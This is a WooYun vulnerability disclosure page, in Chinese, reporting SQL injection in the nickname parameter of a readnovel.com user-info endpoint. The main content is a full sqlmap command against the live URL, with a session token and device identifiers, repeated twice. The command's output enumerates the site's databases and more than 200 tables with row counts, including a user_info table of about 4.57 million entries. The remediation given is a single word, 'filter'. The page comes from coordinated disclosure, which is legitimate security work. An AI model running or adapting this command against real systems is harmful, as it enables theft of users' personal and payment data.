小说阅读网某处SQL注入涉及457w用户信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0209844

漏洞标题：小说阅读网某处SQL注入涉及457w用户信息

漏洞作者：黑色键盘丶

提交时间：2016-05-18 11:05

修复时间：2016-07-05 07:50

公开时间：2016-07-05 07:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-18：细节已通知厂商并且等待厂商处理中
2016-05-21：厂商已经确认，细节仅向厂商公开
2016-05-31：细节向核心白帽子及相关领域专家公开
2016-06-10：细节向普通白帽子公开
2016-06-20：细节向实习白帽子公开
2016-07-05：细节向公众公开

简要描述：

详细说明：

E:\sqlmap>sqlmap.py -u "http://opendata.readnovel.com/web/user.php?a=update_user
_info&uid=60179539&token=dba9e9e37c&tel=&email=&nickname=4238&sex=&ct=android&da
ta=json&pt=client&v=140&imei=864690023834800&srcid=qq&uid=60179539&userid=601795
39&v=140&ct=android&pt=client&srcid=qq&mac_address=02:00:00:00:00:00&imei=864690
023834800&versionname=4.0.0&model=MI3W&pix=1080*1920&system_release=6.0.1&op=CMC
C&activate_code=2016051602583662998600DJZL&language=0" -D newuc -T user_info --c
olumns
-------参数nickname---

数据库信息
available databases [4]:
[*] `ncwq\x02`
[*] information_schema
[*] mysql
[*] newuc

当前库表信息   user_info                            | 4577435 |
Database: newuc
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| pay_expend_log                       | 205367014 |
| user_paid_singlebook                 | 166951129 |
| user_single_visit                    | 93267094 |
| pay_order_log                        | 41009381 |
| task_daily                           | 40657011 |
| user_sign_activity                   | 34592567 |
| user_score_add_log                   | 30218215 |
| system_msg_status                    | 20843500 |
| award_msg                            | 18345760 |
| user_attention                       | 12271643 |
| user_paid_5                          | 11564376 |
| award_msg_status                     | 11297310 |
| user_visit_detail                    | 11226661 |
| user_paid_22                         | 11140516 |
| user_paid_75                         | 10996294 |
| user_paid_90                         | 10956183 |
| user_paid_20                         | 10859449 |
| user_paid_1                          | 10851577 |
| user_paid_43                         | 10848240 |
| user_paid_77                         | 10845670 |
| user_paid_84                         | 10842284 |
| user_paid_46                         | 10835214 |
| user_paid_11                         | 10828751 |
| user_paid_92                         | 10818311 |
| user_paid_47                         | 10804903 |
| user_paid_53                         | 10766280 |
| user_paid_66                         | 10748825 |
| user_paid_15                         | 10742344 |
| user_paid_21                         | 10730124 |
| user_paid_30                         | 10714957 |
| user_paid_70                         | 10713702 |
| user_paid_48                         | 10702062 |
| user_paid_12                         | 10694111 |
| user_paid_27                         | 10678965 |
| user_paid_44                         | 10632472 |
| user_paid_97                         | 10623571 |
| user_paid_86                         | 10611174 |
| user_paid_16                         | 10610156 |
| user_paid_29                         | 10609399 |
| user_paid_42                         | 10575302 |
| user_paid_69                         | 10574212 |
| user_paid_8                          | 10570203 |
| user_paid_40                         | 10567145 |
| user_paid_88                         | 10561514 |
| user_paid_83                         | 10560850 |
| user_paid_26                         | 10546742 |
| user_paid_52                         | 10545737 |
| user_paid_23                         | 10538577 |
| user_paid_7                          | 10525017 |
| user_paid_95                         | 10521665 |
| user_paid_14                         | 10515157 |
| user_paid_87                         | 10514109 |
| user_paid_32                         | 10494317 |
| user_paid_59                         | 10476893 |
| user_paid_72                         | 10472275 |
| user_paid_3                          | 10471612 |
| user_paid_45                         | 10471019 |
| user_paid_85                         | 10462366 |
| user_paid_94                         | 10454878 |
| user_paid_58                         | 10454325 |
| user_paid_18                         | 10452546 |
| user_paid_91                         | 10446261 |
| user_paid_41                         | 10433678 |
| user_paid_81                         | 10430706 |
| user_paid_98                         | 10420251 |
| user_paid_51                         | 10419973 |
| user_paid_64                         | 10419597 |
| user_paid_56                         | 10414576 |
| user_paid_19                         | 10411339 |
| user_paid_38                         | 10409142 |
| user_paid_71                         | 10406400 |
| user_paid_67                         | 10388013 |
| user_paid_93                         | 10384575 |
| user_paid_61                         | 10381603 |
| user_paid_99                         | 10373408 |
| user_paid_68                         | 10369486 |
| user_paid_39                         | 10365896 |
| user_paid_13                         | 10340156 |
| user_paid_34                         | 10319512 |
| user_paid_35                         | 10311584 |
| user_paid_24                         | 10303810 |
| user_paid_4                          | 10287899 |
| user_paid_2                          | 10261545 |
| user_paid_74                         | 10247634 |
| user_paid_6                          | 10244540 |
| user_paid_10                         | 10241835 |
| user_paid_78                         | 10241076 |
| user_paid_9                          | 10239012 |
| user_paid_60                         | 10191479 |
| user_paid_76                         | 10184813 |
| user_paid_73                         | 10184234 |
| user_paid_54                         | 10146843 |
| user_paid_49                         | 10143100 |
| user_paid_37                         | 10133821 |
| user_paid_79                         | 10128351 |
| user_paid_50                         | 10114566 |
| user_paid_17                         | 10104671 |
| user_paid_96                         | 10070994 |
| user_paid_28                         | 10054990 |
| user_paid_62                         | 10039092 |
| user_paid_33                         | 10030816 |
| user_paid_63                         | 10026574 |
| user_paid_89                         | 10008487 |
| user_paid_80                         | 10007214 |
| user_paid_65                         | 9995436 |
| user_paid_57                         | 9978247 |
| user_paid_36                         | 9945938 |
| user_paid_82                         | 9906781 |
| user_paid_25                         | 9876614 |
| user_paid_0                          | 9685536 |
| user_paid_31                         | 9410236 |
| user_config                          | 8054025 |
| user_stat                            | 6695338 |
| user_info                            | 4577435 |
| user_autosub                         | 4139911 |
| task_newer                           | 3780617 |
| user_prize4_book                     | 3061928 |
| inform_msg_status                    | 2725033 |
| system_msg                           | 2530431 |
| user_prepare_paid_singlebook         | 2341524 |
| pay_expend_log_2012_tmp1             | 2193205 |
| user_score                           | 2133842 |
| user_visit                           | 1782049 |
| user_article_expend                  | 1635138 |
| user_prize_info                      | 1632797 |
| user_author_expend                   | 1456297 |
| newsystem_msg_status                 | 1419325 |
| user_sign_activity_continuous        | 1229414 |
| user_prize_book                      | 1206276 |
| user_sign_activity_extend            | 1152967 |
| user_vip_config                      | 1112934 |
| user_discount_book                   | 956946  |
| user_one_time_show                   | 889689  |
| user_icon_log                        | 857007  |
| user_a_key_register                  | 730663  |
| user_daily_report                    | 635701  |
| user_icon_day_log                    | 507567  |
| user_mood                            | 347459  |
| user_icon_status                     | 340685  |
| user_noad_log                        | 330930  |
| user_daily_report_log                | 314799  |
| user_noad_month_log                  | 311745  |
| user_noad_status                     | 282891  |
| user_noad_read_status                | 272161  |
| user_question_activity_1111          | 266676  |
| user_close                           | 232204  |
| user_prize2_book                     | 206175  |
| user_noad_read_num                   | 188195  |
| author_info                          | 179813  |
| user_wap_privilege_log               | 163580  |
| user_prize                           | 158780  |
| user_wap_discount_book               | 152297  |
| user_update_tx                       | 138712  |
| user_prize2_info_2011                | 133933  |
| user_prize2_log_2011                 | 103543  |
| user_prize3                          | 99057   |
| user_ios_integral                    | 98011   |
| user_prize_info3                     | 91581   |
| user_score_expend                    | 73910   |
| user_friendly_order                  | 61619   |
| user_prize2_2011                     | 58287   |
| user_prop                            | 57976   |
| user_month_log                       | 56646   |
| mm_pk_vote                           | 45496   |
| inform_msg                           | 44976   |
| user_weixin_subscribe_log            | 43073   |
| user_month_status                    | 34539   |
| user_weixin_subscribe                | 28734   |
| user_prize2_log                      | 26498   |
| user_fence_book                      | 25979   |
| user_prize2_info_201203              | 23391   |
| user_prize2_log_201203               | 19329   |
| user_mystery_gift_activity           | 17758   |
| user_click_activity                  | 17217   |
| user_wap_pack_log                    | 16339   |
| task_activity                        | 14967   |
| article_subcount                     | 13132   |
| user_prize_log                       | 13013   |
| user_prize2_201203                   | 11565   |
| user_wap_pack_status                 | 10603   |
| user_weixin_lottery                  | 10473   |
| user_lottery_ticket_purchase_history | 8576    |
| user_weixin_binding                  | 7282    |
| user_book_recommend_stat             | 7206    |
| user_daily_report_activity           | 6528    |
| user_activity_cny                    | 6507    |
| user_icon_month_log                  | 5758    |
| user_prize2_info                     | 3711    |
| user_noad_read_opinion               | 3050    |
| user_send_coin_activity              | 2095    |
| user_activity_info                   | 1437    |
| user_sign_activity_prize             | 1122    |
| user_icon_week_log                   | 644     |
| question_activity_1111               | 354     |
| user_activity_book                   | 316     |
| user_stat_top                        | 300     |
| user_score_suggestion                | 249     |
| user_paid_55                         | 108     |
| user_prop_compound_log               | 98      |
| newsystem_msg                        | 82      |
| user_attention_day                   | 58      |
| user_custom_reply_news               | 34      |
| user_app                             | 11      |
| user_score_order                     | 10      |
| user_custom_menu                     | 5       |
| user_apply_unsub_month               | 1       |
| user_read_style                      | 1       |
+--------------------------------------+------

漏洞证明：

E:\sqlmap>sqlmap.py -u "http://opendata.readnovel.com/web/user.php?a=update_user
_info&uid=60179539&token=dba9e9e37c&tel=&email=&nickname=4238&sex=&ct=android&da
ta=json&pt=client&v=140&imei=864690023834800&srcid=qq&uid=60179539&userid=601795
39&v=140&ct=android&pt=client&srcid=qq&mac_address=02:00:00:00:00:00&imei=864690
023834800&versionname=4.0.0&model=MI3W&pix=1080*1920&system_release=6.0.1&op=CMC
C&activate_code=2016051602583662998600DJZL&language=0" -D newuc -T user_info --c
olumns
-------参数nickname---

数据库信息
available databases [4]:
[*] `ncwq\x02`
[*] information_schema
[*] mysql
[*] newuc

当前库表信息   user_info                            | 4577435 |
Database: newuc
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| pay_expend_log                       | 205367014 |
| user_paid_singlebook                 | 166951129 |
| user_single_visit                    | 93267094 |
| pay_order_log                        | 41009381 |
| task_daily                           | 40657011 |
| user_sign_activity                   | 34592567 |
| user_score_add_log                   | 30218215 |
| system_msg_status                    | 20843500 |
| award_msg                            | 18345760 |
| user_attention                       | 12271643 |
| user_paid_5                          | 11564376 |
| award_msg_status                     | 11297310 |
| user_visit_detail                    | 11226661 |
| user_paid_22                         | 11140516 |
| user_paid_75                         | 10996294 |
| user_paid_90                         | 10956183 |
| user_paid_20                         | 10859449 |
| user_paid_1                          | 10851577 |
| user_paid_43                         | 10848240 |
| user_paid_77                         | 10845670 |
| user_paid_84                         | 10842284 |
| user_paid_46                         | 10835214 |
| user_paid_11                         | 10828751 |
| user_paid_92                         | 10818311 |
| user_paid_47                         | 10804903 |
| user_paid_53                         | 10766280 |
| user_paid_66                         | 10748825 |
| user_paid_15                         | 10742344 |
| user_paid_21                         | 10730124 |
| user_paid_30                         | 10714957 |
| user_paid_70                         | 10713702 |
| user_paid_48                         | 10702062 |
| user_paid_12                         | 10694111 |
| user_paid_27                         | 10678965 |
| user_paid_44                         | 10632472 |
| user_paid_97                         | 10623571 |
| user_paid_86                         | 10611174 |
| user_paid_16                         | 10610156 |
| user_paid_29                         | 10609399 |
| user_paid_42                         | 10575302 |
| user_paid_69                         | 10574212 |
| user_paid_8                          | 10570203 |
| user_paid_40                         | 10567145 |
| user_paid_88                         | 10561514 |
| user_paid_83                         | 10560850 |
| user_paid_26                         | 10546742 |
| user_paid_52                         | 10545737 |
| user_paid_23                         | 10538577 |
| user_paid_7                          | 10525017 |
| user_paid_95                         | 10521665 |
| user_paid_14                         | 10515157 |
| user_paid_87                         | 10514109 |
| user_paid_32                         | 10494317 |
| user_paid_59                         | 10476893 |
| user_paid_72                         | 10472275 |
| user_paid_3                          | 10471612 |
| user_paid_45                         | 10471019 |
| user_paid_85                         | 10462366 |
| user_paid_94                         | 10454878 |
| user_paid_58                         | 10454325 |
| user_paid_18                         | 10452546 |
| user_paid_91                         | 10446261 |
| user_paid_41                         | 10433678 |
| user_paid_81                         | 10430706 |
| user_paid_98                         | 10420251 |
| user_paid_51                         | 10419973 |
| user_paid_64                         | 10419597 |
| user_paid_56                         | 10414576 |
| user_paid_19                         | 10411339 |
| user_paid_38                         | 10409142 |
| user_paid_71                         | 10406400 |
| user_paid_67                         | 10388013 |
| user_paid_93                         | 10384575 |
| user_paid_61                         | 10381603 |
| user_paid_99                         | 10373408 |
| user_paid_68                         | 10369486 |
| user_paid_39                         | 10365896 |
| user_paid_13                         | 10340156 |
| user_paid_34                         | 10319512 |
| user_paid_35                         | 10311584 |
| user_paid_24                         | 10303810 |
| user_paid_4                          | 10287899 |
| user_paid_2                          | 10261545 |
| user_paid_74                         | 10247634 |
| user_paid_6                          | 10244540 |
| user_paid_10                         | 10241835 |
| user_paid_78                         | 10241076 |
| user_paid_9                          | 10239012 |
| user_paid_60                         | 10191479 |
| user_paid_76                         | 10184813 |
| user_paid_73                         | 10184234 |
| user_paid_54                         | 10146843 |
| user_paid_49                         | 10143100 |
| user_paid_37                         | 10133821 |
| user_paid_79                         | 10128351 |
| user_paid_50                         | 10114566 |
| user_paid_17                         | 10104671 |
| user_paid_96                         | 10070994 |
| user_paid_28                         | 10054990 |
| user_paid_62                         | 10039092 |
| user_paid_33                         | 10030816 |
| user_paid_63                         | 10026574 |
| user_paid_89                         | 10008487 |
| user_paid_80                         | 10007214 |
| user_paid_65                         | 9995436 |
| user_paid_57                         | 9978247 |
| user_paid_36                         | 9945938 |
| user_paid_82                         | 9906781 |
| user_paid_25                         | 9876614 |
| user_paid_0                          | 9685536 |
| user_paid_31                         | 9410236 |
| user_config                          | 8054025 |
| user_stat                            | 6695338 |
| user_info                            | 4577435 |
| user_autosub                         | 4139911 |
| task_newer                           | 3780617 |
| user_prize4_book                     | 3061928 |
| inform_msg_status                    | 2725033 |
| system_msg                           | 2530431 |
| user_prepare_paid_singlebook         | 2341524 |
| pay_expend_log_2012_tmp1             | 2193205 |
| user_score                           | 2133842 |
| user_visit                           | 1782049 |
| user_article_expend                  | 1635138 |
| user_prize_info                      | 1632797 |
| user_author_expend                   | 1456297 |
| newsystem_msg_status                 | 1419325 |
| user_sign_activity_continuous        | 1229414 |
| user_prize_book                      | 1206276 |
| user_sign_activity_extend            | 1152967 |
| user_vip_config                      | 1112934 |
| user_discount_book                   | 956946  |
| user_one_time_show                   | 889689  |
| user_icon_log                        | 857007  |
| user_a_key_register                  | 730663  |
| user_daily_report                    | 635701  |
| user_icon_day_log                    | 507567  |
| user_mood                            | 347459  |
| user_icon_status                     | 340685  |
| user_noad_log                        | 330930  |
| user_daily_report_log                | 314799  |
| user_noad_month_log                  | 311745  |
| user_noad_status                     | 282891  |
| user_noad_read_status                | 272161  |
| user_question_activity_1111          | 266676  |
| user_close                           | 232204  |
| user_prize2_book                     | 206175  |
| user_noad_read_num                   | 188195  |
| author_info                          | 179813  |
| user_wap_privilege_log               | 163580  |
| user_prize                           | 158780  |
| user_wap_discount_book               | 152297  |
| user_update_tx                       | 138712  |
| user_prize2_info_2011                | 133933  |
| user_prize2_log_2011                 | 103543  |
| user_prize3                          | 99057   |
| user_ios_integral                    | 98011   |
| user_prize_info3                     | 91581   |
| user_score_expend                    | 73910   |
| user_friendly_order                  | 61619   |
| user_prize2_2011                     | 58287   |
| user_prop                            | 57976   |
| user_month_log                       | 56646   |
| mm_pk_vote                           | 45496   |
| inform_msg                           | 44976   |
| user_weixin_subscribe_log            | 43073   |
| user_month_status                    | 34539   |
| user_weixin_subscribe                | 28734   |
| user_prize2_log                      | 26498   |
| user_fence_book                      | 25979   |
| user_prize2_info_201203              | 23391   |
| user_prize2_log_201203               | 19329   |
| user_mystery_gift_activity           | 17758   |
| user_click_activity                  | 17217   |
| user_wap_pack_log                    | 16339   |
| task_activity                        | 14967   |
| article_subcount                     | 13132   |
| user_prize_log                       | 13013   |
| user_prize2_201203                   | 11565   |
| user_wap_pack_status                 | 10603   |
| user_weixin_lottery                  | 10473   |
| user_lottery_ticket_purchase_history | 8576    |
| user_weixin_binding                  | 7282    |
| user_book_recommend_stat             | 7206    |
| user_daily_report_activity           | 6528    |
| user_activity_cny                    | 6507    |
| user_icon_month_log                  | 5758    |
| user_prize2_info                     | 3711    |
| user_noad_read_opinion               | 3050    |
| user_send_coin_activity              | 2095    |
| user_activity_info                   | 1437    |
| user_sign_activity_prize             | 1122    |
| user_icon_week_log                   | 644     |
| question_activity_1111               | 354     |
| user_activity_book                   | 316     |
| user_stat_top                        | 300     |
| user_score_suggestion                | 249     |
| user_paid_55                         | 108     |
| user_prop_compound_log               | 98      |
| newsystem_msg                        | 82      |
| user_attention_day                   | 58      |
| user_custom_reply_news               | 34      |
| user_app                             | 11      |
| user_score_order                     | 10      |
| user_custom_menu                     | 5       |
| user_apply_unsub_month               | 1       |
| user_read_style                      | 1       |
+--------------------------------------+------

修复方案：

过滤

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-05-21 07:41

厂商回复：

感谢您对小说阅读网的关注！

漏洞评价：

评价

2016-05-18 11:13 | 爱偷懒的98 ( 普通白帽子 | Rank:154 漏洞数:58 | 从前车马邮件都很慢，一生只够爱一个人。)

前排
2016-05-18 11:29 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

又是首页了哦！
2016-05-18 12:12 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg？得失乐与悲与Av Qq205655539)

前排
2016-05-18 12:38 | 爱偷懒的98 ( 普通白帽子 | Rank:154 漏洞数:58 | 从前车马邮件都很慢，一生只够爱一个人。)

@放逐每次都看见你
2016-05-18 21:16 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg？得失乐与悲与Av Qq205655539)

@爱偷懒的98 刷百度关键字啊哈
2016-05-18 21:47 | 爱偷懒的98 ( 普通白帽子 | Rank:154 漏洞数:58 | 从前车马邮件都很慢，一生只够爱一个人。)

@放逐什么瘠薄。。。阴魂不散哈哈
2016-05-19 12:41 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg？得失乐与悲与Av Qq205655539)

@爱偷懒的98 嘿嘿嘿嘿

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0209844

漏洞标题：小说阅读网某处SQL注入涉及457w用户信息

相关厂商：readnovel.com

漏洞作者：黑色键盘丶

提交时间：2016-05-18 11:05

修复时间：2016-07-05 07:50

公开时间：2016-07-05 07:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0209844

漏洞标题：小说阅读网某处SQL注入涉及457w用户信息

相关厂商：readnovel.com

漏洞作者： 黑色键盘丶

提交时间：2016-05-18 11:05

修复时间：2016-07-05 07:50

公开时间：2016-07-05 07:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0209844"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：黑色键盘丶

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源黑色键盘丶@乌云